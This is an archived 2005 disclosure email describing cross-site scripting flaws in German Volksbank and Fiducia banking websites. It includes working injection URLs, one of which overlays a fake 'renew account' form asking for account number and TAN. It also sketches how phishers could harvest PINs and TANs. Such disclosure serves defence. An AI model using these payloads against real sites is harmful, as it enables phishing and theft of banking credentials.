exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VolksbankXSS.txt

VolksbankXSS.txt
Posted Dec 28, 2005
Authored by Constantin.Hofstetter | Site consti.de

Germanys second largest financial institute's ebanking portal (Volksbank Raiffeisenbank) suffers from several XSS vulnerabilities.

tags | advisory, vulnerability
SHA-256 | 290d5918ad1f1085432ec191baf145feb7f4fe566eb730da9139519b1239600e

VolksbankXSS.txt

Change Mirror Download
------=_Part_645_19031613.1135281748982
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I emaild the Administrators 2 months ago - the only response I got was
something like:
"We will look into it, but we may or may not change anything on the page -
who knows; we wont tell you!".
I called them and the guy on the phone laughed at me.

Here are the links / examples:

*Original:*
https://www.vr-ebanking.de/index.php?RZBK=3D0280 [vr-ebanking.de]
*MY Version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=3DXA?Action=3DSelectMenu&SMID=3D=
EigenesOrderbuch&MenuName=3D&Ini
t Href=3Dhttp://www.consti.de/secure<https://www.vr-ebanking.de/help;jsessi=
onid=3DXA?Action=3DSelectMenu&SMID=3DEigenesOrderbuch&MenuName=3D&InitHref=
=3Dhttp://www.consti.de/secure>[
vr-ebanking.de]
*/F=E4lschung --> Imitation /*
My local Banks Website:
http://voba-lindenberg.de/content_suche.php?search=3D<b>Mysql_Injection?</b=
>'<http://voba-lindenberg.de/content_suche.php?search=3D%3Cdiv%20style=3Dz-=
index:2000;position:absolute;margin-top:-52>

The Institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=
=3DAA%22%3E<b>Whatever_You_Like_</b>&SearchMax=3D10
<http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&quer=
y=3DAA%22%3E%3Cdiv%20style=3Dz-index:2000;position:absolute;width:90%25;hei=
ght:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Er=
neuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3=
E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%=
3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%=
3E%3C/td%3E%3Ctd%3E%3Cinput%20type=3Dsubmit%20value=3DAktivieren%3E%3C/td%3=
E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=3D%22&SearchMax=3D10>

and so on..

The vr-ebanking site is used by millions of people each day for their daily
financial stuff (ebanking) - someone (phisers) could easily use the CSS
(Cross Site Scripting) to create
real looking websites "within" the domain; More importantly they could
create a website that does all the true login stuff (in the background) but
sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql
database full of working tans!).
This is not looking to good for my bank, but they dont listen -

--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter@gmail.com
mailmespam@gmail.com

------=_Part_645_19031613.1135281748982
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I emaild the Administrators 2 months ago - the only response I got was some=
thing like:<br>"We will look into it, but we may or may not change any=
thing on the page - who knows; we wont tell you!".<br>I called them an=
d the guy on the phone laughed at me.
<br><br>Here are the links / examples:<br><br><p>
<b>Original:</b> <br>
<a href=3D"https://www.vr-ebanking.de/index.php?RZBK=3D0280" title=3D"vr-eb=
anking.de" rel=3D"nofollow">https://www.vr-ebanking.de/index.php?RZBK=3D028=
0</a> [<a href=3D"http://vr-ebanking.de">vr-ebanking.de</a>]
<br> <b>MY Version (CSS):</b> <br>
<a href=3D"https://www.vr-ebanking.de/help;jsessionid=3DXA?Action=3DSelectM=
enu&SMID=3DEigenesOrderbuch&MenuName=3D&InitHref=3Dhttp://www.c=
onsti.de/secure" title=3D"vr-ebanking.de" rel=3D"nofollow">https://www.vr-e=
banking.de/help;jsessionid=3DXA?Act
i on=3DSelectMenu&SMID=3DEigenesOrderbuch&MenuName=3D&Init Href=
=3Dhttp://www.consti.de/secure</a> [<a href=3D"http://vr-ebanking.de">vr-eb=
anking.de</a>]
<br> <i>/F=E4lschung --> Imitation /</i> </p><span style=3D"font-weight:=
bold;">My local Banks Website:</span><br><a onclick=3D"return top.js.OpenE=
xtLink(window,event,this)" href=3D"http://voba-lindenberg.de/content_suche.=
php?search=3D%3Cdiv%20style=3Dz-index:2000;position:absolute;margin-top:-52=
" target=3D"_blank">
http://voba-lindenberg.de/content_suche.php?search=3D<b>Mysql_Injecti=
on?</b>'</a><br><br><span style=3D"font-weight: bold;">The Institute =
that should secure the financial institute's websites:</span><br><span styl=
e=3D"font-weight: bold;">
</span>
<a href=3D"http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21Searc=
hView&query=3DAA%22%3E%3Cdiv%20style=3Dz-index:2000;position:absolute;w=
idth:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch=
1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKonto=
nummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%=
3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E=
%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=3Dsubmit%20value=3DAktivie=
ren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=3D%22&Se=
archMax=3D10" target=3D"_blank" onclick=3D"return top.js.OpenExtLink(window=
,event,this)">

http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&que=
ry=3DAA%22%3E<b>Whatever_You_Like_</b>&SearchMax=3D10
</a><br><br clear=3D"all">and so on..<br><br>The vr-ebanking site is used b=
y millions of people each day for their daily financial stuff (ebanking) - =
someone (phisers) could easily use the CSS (Cross Site Scripting) to create
<br>real looking websites "within" the domain; More importantly t=
hey could create a website that does all the true login stuff (in the backg=
round) but sniffs out the TANs and PINs (think <a href=3D"http://snoopy.in"=
>
snoopy.in</a>, think curl, think a mysql database full of working tans!).<b=
r>This is not looking to good for my bank, but they dont listen -<br><br>--=
<br>Constantin Hofstetter<br><a href=3D"http://www.consti.de">http://www.c=
onsti.de
</a><br><a href=3D"mailto:Constantin.Hofstetter@gmail.com">Constantin.Hofst=
etter@gmail.com</a><br><a href=3D"mailto:mailmespam@gmail.com">mailmespam@g=
mail.com</a>

------=_Part_645_19031613.1135281748982--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close